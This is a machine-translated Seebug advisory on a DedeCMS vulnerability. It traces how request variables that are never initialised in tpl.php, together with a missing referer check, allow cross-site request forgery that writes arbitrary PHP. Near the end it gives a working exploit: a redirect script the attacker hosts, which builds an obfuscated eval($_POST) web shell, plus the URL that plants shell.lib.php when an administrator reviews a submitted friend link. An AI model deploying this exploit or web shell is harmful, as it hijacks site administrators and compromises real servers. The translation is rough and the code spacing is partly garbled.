dedeCMS use links to mention the right vulnerability

2017-01-18T00:00:00
ID SSV:92625
Type seebug
Reporter 孤独风
Modified 2017-01-18T00:00:00

Description

In the tpl. php

/*--------------------------- function savetagfile() { } Save the label pieces to modify --------------------------*/ else if($action=='savetagfile') { if(! preg_match("#^[a-z0-9_-]{1,}\. lib\.php$#i", $filename)) { ShowMsg('file name is not legal, not allowed!', '-1'); exit(); } require_once(DEDEINC.'/ oxwindow.class.php'); $tagname = preg_replace("#\. lib\.php$#i", "", $filename); $content = stripslashes($content); $truefile = DEDEINC.'/ taglib/'.$ filename; $fp = fopen($truefile, 'w'); fwrite($fp, $content); fclose($fp); $msg = " <form name='form1' action='tag_test_action.php' target='blank' method='post'> <input type='hidden' name='dopost' value='make' /> <b>test tag:</b>(the need to use environment variables in the test) <textarea name='partcode' cols='150' rows='6' style='width:90%;'>{dede:{$tagname} }{/dede:{$tagname}}</textarea> <input name='imageField1' type='image' class='np' src='images/button_ok.gif' width='60' height='22' border='0' /> </form> "; $wintitle = "successfully modified/created file!"; $wecome_info = "<a href='templets_tagsource.php'>label source code fragments management</a> >> modify/create new label"; $win = new OxWindow(); $win->AddTitle("modify/New Tag:"); $win->AddMsgItem($msg); $winform = $win->GetWindow("hand"," ",false); $win->Display(); exit(); } Here is exploit written to the file place, but we know that substantially all of the insecurity, in the data input and output occurs, where the parameter is what is passed over? There are$filename and$content is how to pass parameters? Continue to track config. php and the include. common.inc.php while the General case, similar to the common. php this file name, which will contain some of will be frequently used functions. Continue to follow up. 果然发现了猫腻在common.inc.php found

oreach(Array('_GET','_POST','_COOKIE') as $_request) { foreach($$_request as $_k => $_v) { if($_k == 'nvarname') ${$_k} = $_v; else ${$_k} = _RunMagicQuotes($_v); } } What's the problem? This code probably mean from the array to obtain the parameters of the party, here, GET,POST,COOKIE parameters that have been.

First to keep track of GET, a two-layer circulation in the$_GET(this can be seen as a global array)**$_k ,$_v get an array of key, value.$ {$_k}here the global register variable, if the input to the GET-parameters ? test=k4l0n. Then in the php page and all contained this page of the php page, the $test value being assigned a value in order to kl0n And tpl. in php$action,$content,$filename variable is not initialized, so that it can manipulate these variables to write any code.

Continue to track 'userLogin' class of the getUserID function: * * Get the user ID * * @access public * @return int */ function getUserID() { if($this->userID != ") { return $this->userID; } else { return -1; } } 'userLogin' class user login

`` __ * Test whether the user is correct _ * @access public * @param string $username username * @param string $userpwd password * @return string _/ function checkUser($username, $userpwd) { global $dsql;

//Only allow user name and password with 0-9,a-z,A-Z,'@','_','.','-' These characters
 $this->userName = preg_replace("/[^0-9a-zA-Z_@!\.-]/", ", $username);
 $this->userPwd = preg_replace("/[^0-9a-zA-Z_@!\.-]/", ", $userpwd);
 $pwd = substr(md5($this->userPwd), 5, 20);
 $dsql->SetQuery("SELECT admin.*, atype. purviews FROM `#@__admin` admin LEFT JOIN `#@__admintype` atype ON atype. rank=admin. usertype WHERE admin. userid LIKE '".$ this->userName."' LIMIT 0,1");
$dsql->Execute();
 $row = $dsql->GetObject();
if(! isset($row->pwd))
{
 return -1;
}
 else if($pwd!=$ row->pwd)
{
 return -2;
}
else
{
 $loginip = GetIP();
 $this->userID = $row->id;
 $this->userType = $row->usertype;
 $this->userChannel = $row->typeid;
 $this->userName = $row->uname;
 $this->userPurview = $row->purviews;
 $all = "UPDATE `#@__admin` SET loginip='$loginip',logintime='". time()."' WHERE id='".$ row->id."'";
$dsql->ExecuteNoneQuery($all);
 $sql = "UPDATE #@__member SET logintime=". time().", loginip='$loginip' WHERE mid=".$ row->id;
$dsql->ExecuteNoneQuery($sql);
 return 1;
}
}

/**
 * Maintain the user's session state
*
 * @access public
 * @return int success returns 1, failure returns -1
*/
function keepUser()
{
 if($this->userID != "&& $this->userType != ")
{
 global $admincachefile,$adminstyle;
 if(empty($adminstyle)) $adminstyle = 'dedecms';

@session_register($this->keepUserIDTag);
 $_SESSION[$this->keepUserIDTag] = $this->userID;

@session_register($this->keepUserTypeTag);
 $_SESSION[$this->keepUserTypeTag] = $this->userType;

@session_register($this->keepUserChannelTag);
 $_SESSION[$this->keepUserChannelTag] = $this->userChannel;

@session_register($this->keepUserNameTag);
 $_SESSION[$this->keepUserNameTag] = $this->userName;

@session_register($this->keepUserPurviewTag);
 $_SESSION[$this->keepUserPurviewTag] = $this->userPurview;

@session_register($this->keepAdminStyleTag);
 $_SESSION[$this->keepAdminStyleTag] = $adminstyle;

 PutCookie('DedeUserID', $this->userID, 3600 * 24, '/');
 PutCookie('DedeLoginTime', time(), 3600 * 24, '/');

$this->ReWriteAdminChannel();

 return 1;
}
else
{
 return -1;
}
}

`` By tracking found, where no administrator of the source page for any checks, just check out whether the administrator login, which resulted in a CSRF vulnerability. To here exploits the idea is very clear, since the variables can be controlled vulnerability can lead to write any code, since the CSRF vulnerability induced administrator to administrator permission to write into the code.

Vulnerability EXP

<? php //print_r($_SERVER); $referer = $_SERVER['HTTP_REFERER']; $dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php that made dede the background of the path //Splice exp $muma= '<'.'?'.'@'.' e'.'v'.'a'.'l'.' ('.'$'.'_'.' P'.' O'.' S'.' T'.' ['.'\".' c'.'\".']'.')'.';'.'?'.'>'; $exp = 'tpl. php? action=savetagfile&actiondo=addnewtag&content='. $muma .'& filename=shell.lib.php'; $url = $dede_login.$ exp; //echo $url; header("location: ".$ url); // send mail coder exit(); ?>

Vulnerability reproduction

First, will this exp deploy on your server, of course you must have a public ip, let's say your url is: http://www.xxxx.com/exp.php` On the target website, the application link at the application a link

After submission wait for administrator review, when the administrator audit, the General case will point into your website, take a look at

Review of the place in the background—on module—for auxiliary plug-in—action links

When the point of this link when it generates the word shell, shell地址在//include/taglib/shell.lib.php

The administrator has triggered a link

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP1-Full/uploads/dede/tpl.php?action=savetagfile&actiondo=addnewtag&content=%3C?@eval($_POST[%27c%27]);?% 3E&filename=shell.lib.php

This link is to use the Administrators permission to generate a word.